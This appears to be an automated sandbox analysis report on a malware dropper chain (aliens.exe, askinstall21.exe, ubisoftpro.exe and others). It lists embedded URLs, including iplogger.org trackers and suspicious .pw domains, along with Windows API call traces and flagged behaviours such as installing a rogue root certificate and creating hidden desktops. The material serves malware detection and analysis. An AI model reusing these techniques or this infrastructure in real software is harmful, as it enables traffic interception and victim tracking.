Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvrrg.img?h=166&w=310
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yHSm.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yqHP.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
Source: 85F91A36E275562F.exe.19.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 85F91A36E275562F.exe.19.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 85F91A36E275562F.exe.19.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: askinstall21.exeString found in binary or memory: http://www.fddnice.pw/
Source: askinstall21.exeString found in binary or memory: http://www.ipcode.pw/
Source: askinstall21.exeString found in binary or memory: http://www.ipcode.pw/0.0.0.0CNpathSOFTWARE
Source: jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: ubisoftpro.exeString found in binary or memory: http://www.winimage.com/zLibDll
Source: askinstall21.exeString found in binary or memory: http://www.zxfc.pw/Home/Index/sksxz?uid=3a1c3033bf5a5764882caec7a4cf3849e7de2ef2a8d79cece23467f1d887
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: Setup.exe, 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmpString found in binary or memory: https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_
Source: jg2_2qua.exe, 0000001A.00000003.498781258.00000000040A8000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: aliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmpString found in binary or memory: https://charlesproxy.com/ssl1
Source: jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: jg2_2qua.exe, 0000001A.00000003.493950837.0000000003F18000.00000004.00000001.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/16ajh7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/16xjh7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/19iM77
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1Ka7t7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1KyTy7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1O2BH
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1OXFG
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1OZVH
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1OhAG
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1T79i7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1T89i7
Source: John_Ship.urlString found in binary or memory: https://iplogger.org/1TT4a7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1TW3i7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1UpU57
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1Uts87
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1X8M97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1XJq97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1XKq97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1XSq97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1b4887
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1bV787
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1lC5g
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1q6Jt7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1uVkt7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1yXwr7
Source: ubisoftpro.exeString found in binary or memory: https://iplogger.org/2WS9q6ubisoftplushttps://iplogger.org/2WF9q6ubisoftsmphttps://iplogger.org/2WJ9
Source: ubisoftpro.exeString found in binary or memory: https://iplogger.org/2WX9q6ubisoftmorehttps://iplogger.org/2WN9q6ubisoftablehttps://iplogger.org/2W6
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.480069462.0000000000724000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/ZdnY7
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, SibClr.dll.15.drString found in binary or memory: https://sectigo.com/CPS0
Source: hjjgaa.exeString found in binary or memory: https://sectigo.com/CPS0B
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drString found in binary or memory: https://sectigo.com/CPS0D
Source: ubisoftpro.exeString found in binary or memory: https://www.airbnb.cn/account-settings
Source: ubisoftpro.exeString found in binary or memory: https://www.airbnb.cn/account-settingstext/html
Source: jg2_2qua.exe, 0000001A.00000003.489035024.0000000003DA7000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.496197862.0000000004020000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
Source: jg2_2qua.exe, 0000001A.00000003.493950837.0000000003F18000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: jg2_2qua.exe, 0000001A.00000003.497641721.0000000004020000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.h
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.496197862.0000000004020000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: jg2_2qua.exe, 0000001A.00000003.493311716.0000000003D67000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0046C604 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: Setup.exe, 0000000F.00000002.468343589.000000000077A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0126BF99 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

E-Banking Fraud:

barindex
Registers a new ROOT certificateShow sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEA4C20 _DebugHeapAllocator,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,std::ios_base::good,ExpandEnvironmentStringsW,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,Concurrency::details::ContextBase::GetWorkQueueIdentity,GetCurrentThreadId,GetThreadDesktop,CreateDesktopW,GetLastError,SetThreadDesktop,GetLastError,CloseDesktop,CreateProcessW,GetLastError,CloseDesktop,CloseHandle,CreateJobObjectW,AssignProcessToJobObject,_DebugHeapAllocator,Sleep,Sleep,_DebugHeapAllocator,SetThreadDesktop,CloseDesktop,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,

System Summary:

barindex
PE file has a writeable .text sectionShow sources
Source: aliens.exe.17.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 85F91A36E275562F.exe.19.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00057165: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC80F7
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ECA6AE
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EE209E
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC5894
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED51D4
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED9951
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED5AE8
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ECB2CF
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC4AD7
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EE6224
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EE1BF0
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED6352
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC548E
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC15F3
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED56D0
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED9722
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC4F0B
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED5F1D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0128615A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012940EE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01291322
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0128428A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0126C58B
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0127C739
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01294660
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012846A2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01293B7C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01284AD7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01283D96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01284F0C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01294E08
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01295E96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10008B24
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10099217
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1007E330
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10097B40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10084E00
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1007FE90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1000BEB6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1008FF8D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10012FD3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEF9FF6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEECE40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEEAE3E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEFBC5D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEFFC01
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEFBB3D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE77A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE756E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE733C
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00058525
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000665B6
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006702F
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005404E
